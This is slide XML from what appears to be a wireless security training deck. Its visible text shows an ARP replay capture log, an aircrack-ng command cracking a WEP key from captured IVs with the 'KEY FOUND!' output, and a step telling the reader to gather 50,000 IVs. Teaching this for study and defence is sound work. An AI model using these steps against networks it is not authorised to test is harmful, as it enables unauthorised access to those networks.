                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Saving ARP requests in replay_arp-0219-123051.cap </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>You should also start airodump-ng to capture replies</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Read 11978 packets (got 7193 ARP requests), sent 3902 packets...</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1589181" y="1138328"/>
              <a:ext cx="7370064" cy="370635"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>
            </a:solidFill>
            <a:ln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none" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2075813" y="1174142"/>
              <a:ext cx="1709891" cy="30171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600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Command Prompt</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 3" descr="E:\Web2.0 PNG Icons\Windows Command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2924" y="1146196"/>
              <a:ext cx="398185" cy="3497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3" descr="X:\Maqbool\Icons\x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78887" y="1200788"/>
              <a:ext cx="228600" cy="2286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2" name="Group 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="483510" y="3415156"/>
            <a:ext cx="7518203" cy="3046666"/>
            <a:chOff x="250117" y="359484"/>
            <a:chExt cx="7370064" cy="2986635"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="250117" y="374319"/>
              <a:ext cx="7370064" cy="2971800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>
            </a:solidFill>
            <a:ln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none" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="283026" y="396939"/>
              <a:ext cx="7292998" cy="2909791"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:ln w="76200"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none" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="323062" y="767572"/>
              <a:ext cx="7184722" cy="2539157"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst>
              <a:innerShdw blurRad="114300">
                <a:prstClr val="black"/>
              </a:innerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
              </a:pP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C:\&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>aircrack-ng -s capture.ivs</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pP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Opening capture.ivs</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pP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Read  75168 packets.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
              </a:pP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Aircrack-ng 0.7 r130 </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
              </a:pP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[00:00:10] Tested 77 keys (got 684002 IVs) </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
              </a:pP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KB depth byte(vote) </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
              </a:pP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0 0/ 1 AE( 199) 29( 27) 2D( 13) 7C( 12) FE( 12) FF( 6) 39( 5) 2C( 3) 00( 0) 08( 0) </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
              </a:pP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1 0/ 3 66( 41) F1( 33) 4C( 23) 00( 19) 9F( 19) C7( 18) 64( 9) 7A( 9) 7B( 9) F6( 9) </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
              </a:pP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2 0/ 2 5C( 89) 52( 60) E3( 22) 10( 20) F3( 18) 8B( 15) 8E( 15) 14( 13) D2( 11) 47( 10) </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
              </a:pP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3 0/ 1 FD( 375) 81( 40) 1D( 26) 99( 26) D2( 23) 33( 20) 2C( 19) 05( 17) 0B( 17) 35( 17)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="12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		KEY FOUND! [ AE:66:5C:FD:24 ]</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="250117" y="359484"/>
              <a:ext cx="7370064" cy="370635"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>
            </a:solidFill>
            <a:ln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none" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mj-lt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736749" y="376877"/>
              <a:ext cx="1744261" cy="33855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600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Command Prompt</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="Picture 3" descr="E:\Web2.0 PNG Icons\Windows Command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3860" y="367352"/>
              <a:ext cx="398185" cy="3497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9" name="Picture 4" descr="X:\Web2.0 PNG Icons\wifi\Scroll-bar vertical.png"/>
            <p:cNvPicPr preferRelativeResize="0">
              <a:picLocks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61912" y="727423"/>
              <a:ext cx="210312" cy="257860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0" name="Picture 3" descr="X:\Maqbool\Icons\x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39823" y="421944"/>
              <a:ext cx="228600" cy="2286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23" name="Straight Arrow Connector 22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5511932" y="1735744"/>
            <a:ext cx="2549614" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/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Arrow Connector 23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2982422" y="4017388"/>
            <a:ext cx="5064214" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/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Group 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC2FBBFB-F7FB-4AD9-BF8E-7AD4D97CF74E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="8060422" y="3380186"/>
            <a:ext cx="3976028" cy="1191814"/>
            <a:chOff x="9691313" y="2247258"/>
            <a:chExt cx="3373922" cy="984970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Freeform 103">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73636B3C-655E-47BA-8629-529D684CB7D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2055961" y="2418158"/>
              <a:ext cx="1009274" cy="814070"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1837"/>
                <a:gd name="T1" fmla="*/ 0 h 1954"/>
                <a:gd name="T2" fmla="*/ 0 w 1837"/>
                <a:gd name="T3" fmla="*/ 0 h 1954"/>
                <a:gd name="T4" fmla="*/ 1836 w 1837"/>
                <a:gd name="T5" fmla="*/ 0 h 1954"/>
                <a:gd name="T6" fmla="*/ 1836 w 1837"/>
                <a:gd name="T7" fmla="*/ 1825 h 1954"/>
                <a:gd name="T8" fmla="*/ 0 w 1837"/>
                <a:gd name="T9" fmla="*/ 1825 h 1954"/>
                <a:gd name="T10" fmla="*/ 0 w 1837"/>
                <a:gd name="T11" fmla="*/ 0 h 1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37" h="1954">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="603" y="137"/>
                    <a:pt x="1234" y="137"/>
                    <a:pt x="1836" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1836" y="611"/>
                    <a:pt x="1836" y="1214"/>
                    <a:pt x="1836" y="1825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1234" y="1953"/>
                    <a:pt x="603" y="1953"/>
                    <a:pt x="0" y="1825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1214"/>
                    <a:pt x="0" y="611"/>
                    <a:pt x="0" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E8E8E8"/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defTabSz="91421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7A64B276-B5FF-4FC1-98FE-8F3C1445939F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9691313" y="2247258"/>
              <a:ext cx="2672030" cy="931679"/>
              <a:chOff x="9691313" y="2247258"/>
              <a:chExt cx="2672030" cy="931679"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Freeform 104">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0AACA20-3365-47CE-AB5E-8095492D0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12055961" y="2247258"/>
                <a:ext cx="307382" cy="931679"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 558 w 559"/>
                  <a:gd name="T1" fmla="*/ 2236 h 2237"/>
                  <a:gd name="T2" fmla="*/ 0 w 559"/>
                  <a:gd name="T3" fmla="*/ 1817 h 2237"/>
                  <a:gd name="T4" fmla="*/ 0 w 559"/>
                  <a:gd name="T5" fmla="*/ 0 h 2237"/>
                  <a:gd name="T6" fmla="*/ 558 w 559"/>
                  <a:gd name="T7" fmla="*/ 420 h 2237"/>
                  <a:gd name="T8" fmla="*/ 558 w 559"/>
                  <a:gd name="T9" fmla="*/ 2236 h 2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9" h="2237">
                    <a:moveTo>
                      <a:pt x="558" y="2236"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="2236"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="E8E8E8">
                  <a:lumMod val="75000"/>
                </a:srgb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defTabSz="91421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" name="Freeform 105">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84215DEB-0206-4292-A462-831C5221A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9691313" y="2247258"/>
                <a:ext cx="2672030" cy="757104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T1" fmla="*/ 1817 h 1818"/>
                  <a:gd name="T2" fmla="*/ 0 w 4869"/>
                  <a:gd name="T3" fmla="*/ 1817 h 1818"/>
                  <a:gd name="T4" fmla="*/ 0 w 4869"/>
                  <a:gd name="T5" fmla="*/ 0 h 1818"/>
                  <a:gd name="T6" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T7" fmla="*/ 0 h 1818"/>
                  <a:gd name="T8" fmla="*/ 4173 w 4869"/>
                  <a:gd name="T9" fmla="*/ 912 h 1818"/>
                  <a:gd name="T10" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T11" fmla="*/ 1817 h 1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69" h="1818">
                    <a:moveTo>
                      <a:pt x="4868" y="1817"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4868" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4173" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4868" y="1817"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="162F3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21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" name="Text Box 106">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBCF30FE-CE99-4980-82F0-0A086437A1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flipH="1">
                <a:off x="10310914" y="2440210"/>
                <a:ext cx="1776513" cy="35466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/>
              <a:lstStyle>
                <a:lvl1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1pPr>
                <a:lvl2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2pPr>
                <a:lvl3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3pPr>
                <a:lvl4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4pPr>
                <a:lvl5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5pPr>
                <a:lvl6pPr marL="2514600" indent="-228600" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="93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charset="0"/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6pPr>
                <a:lvl7pPr marL="2971800" indent="-228600" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="93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charset="0"/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7pPr>
                <a:lvl8pPr marL="3429000" indent="-228600" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="93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charset="0"/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8pPr>
                <a:lvl9pPr marL="3886200" indent="-228600" fontAlgn="base" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPct val="93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charset="0"/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9pPr>
              </a:lstStyle>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914217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228600" algn="l"/>
                    <a:tab pos="457200" algn="l"/>
                    <a:tab pos="685800" algn="l"/>
                    <a:tab pos="914400" algn="l"/>
                    <a:tab pos="1143000" algn="l"/>
                    <a:tab pos="1371600" algn="l"/>
                    <a:tab pos="1600200" algn="l"/>
                    <a:tab pos="1828800" algn="l"/>
                    <a:tab pos="2057400" algn="l"/>
                    <a:tab pos="2286000" algn="l"/>
                    <a:tab pos="2514600" algn="l"/>
                    <a:tab pos="2743200" algn="l"/>
                    <a:tab pos="2971800" algn="l"/>
                    <a:tab pos="3200400" algn="l"/>
                    <a:tab pos="3429000" algn="l"/>
                    <a:tab pos="3657600" algn="l"/>
                    <a:tab pos="3886200" algn="l"/>
                    <a:tab pos="4114800" algn="l"/>
                    <a:tab pos="4343400" algn="l"/>
                    <a:tab pos="4572000" algn="l"/>
                  </a:tabLst>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" sz="500" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:srgbClr val="F1F0F0"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                    <a:ea typeface="SimSun" charset="0"/>
                    <a:cs typeface="Roboto Black" charset="0"/>
                  </a:rPr>
                  <a:t>OPTION 01</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34" name="Freeform 107">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E520506-94AC-4DC4-9389-3CF7D3FF0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9691313" y="2247258"/>
                <a:ext cx="2672030" cy="757104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T1" fmla="*/ 1817 h 1818"/>
                  <a:gd name="T2" fmla="*/ 0 w 4869"/>
                  <a:gd name="T3" fmla="*/ 1817 h 1818"/>
                  <a:gd name="T4" fmla="*/ 0 w 4869"/>
                  <a:gd name="T5" fmla="*/ 0 h 1818"/>
                  <a:gd name="T6" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T7" fmla="*/ 0 h 1818"/>
                  <a:gd name="T8" fmla="*/ 4173 w 4869"/>
                  <a:gd name="T9" fmla="*/ 912 h 1818"/>
                  <a:gd name="T10" fmla="*/ 4868 w 4869"/>
                  <a:gd name="T11" fmla="*/ 1817 h 1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69" h="1818">
                    <a:moveTo>
                      <a:pt x="4868" y="1817"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4868" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4173" y="912"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4868" y="1817"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="E8E8E8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defTabSz="91421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35" name="Rectangle 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{230F0B50-71E6-45E3-AFE4-A05C10BC7EA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8120256" y="3849618"/>
            <a:ext cx="756676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r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Step 5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98670978-108A-42FF-A4A1-7BC0AFBBE74E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8939262" y="3465116"/>
            <a:ext cx="2769228" cy="73866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US" sz="1400" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Wait for airodump-ng to capture more than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>50,000 IVs; c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>rack WEP key using aircrack-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 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4CB70304-C95E-4D7B-A7F1-0B5C764438B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="8062992" y="1224830"/>
            <a:ext cx="3976028" cy="984970"/>
            <a:chOff x="9691313" y="2247258"/>
            <a:chExt cx="3373922" cy="984970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Freeform 103">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86E0F2A3-65FC-4636-9F8B-89A97437BB7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2055961" y="2418158"/>
              <a:ext cx="1009274" cy="814070"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1837"/>
                <a:gd name="T1" fmla="*/ 0 h 1954"/>
                <a:gd name="T2" fmla="*/ 0 w 1837"/>
                <a:gd name="T3" fmla="*/ 0 h 1954"/>
                <a:gd name="T4" fmla="*/ 1836 w 1837"/>
                <a:gd name="T5" fmla="*/ 0 h 1954"/>
                <a:gd name="T6" fmla="*/ 1836 w 1837"/>
                <a:gd name="T7" fmla="*/ 1825 h 1954"/>
                <a:gd name="T8" fmla="*/ 0 w 1837"/>
                <a:gd name="T9" fmla="*/ 1825 h 1954"/>
                <a:gd name="T10" fmla="*/ 0 w 1837"/>
                <a:gd name="T11" fmla="*/ 0 h 1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37" h="1954">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="603" y="137"/>
                    <a:pt x="1234" y="137"/>
                    <a:pt x="1836" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1836" y="611"/>
                    <a:pt x="1836" y="1214"/>
                    <a:pt x="1836" y="1825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1234" y="1953"/>
                    <a:pt x="603" y="1953"/>
                    <a:pt x="0" y="1825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1214"/>
                    <a:pt x="0" y="611"/>
                    <a:pt x="0" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E8E8E8"/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defTabSz="91421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F9A8DB10-26B3-45FE-9334-E6555886E92B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9691313" y="2247258"/>
              <a:ext cx="2672030" cy="931679"/>
              <a:chOff x="9691313" y="2247258"/>
              <a:chExt cx="2672030" cy="931679"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Freeform 104">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D25B1953-F0BE-4417-882D-FE207792C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12055961" y="2247258"/>
                <a:ext cx="307382" cy="931679"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 558 w 559"/>
                  <a:gd name="T1" fmla="*/ 2236 h 2237"/>
                  <a:gd name="T2" fmla="*/ 0 w 559"/>
                  <a:gd name="T3" fmla="*/ 1817 h 2237"/>
                  <a:gd name="T4" fmla="*/ 0 w 559"/>
                  <a:gd name="T5" fmla="*/ 0 h 2237"/>
                  <a:gd name="T6" fmla="*/ 558 w 559"/>
                  <a:gd name="T7" fmla="*/ 420 h 2237"/>
                  <a:gd name="T8" fmla="*/ 558 w 559"/>
                  <a:gd name="T9" fmla="*/ 2236 h 2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9" h="2237">
                    <a:moveTo>
                      <a:pt x="558" y="2236"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="2236"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="E8E8E8">
                  <a:lumMod val="75000"/>
                </a:srgb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defTabSz="91421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" name="Freeform 105">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C733065F-B91E-45E5-9555-DAEFF49AF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9691313" y="2247258"/>
                <a:ext cx="2672030" cy="757104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4868 w 4869"/>
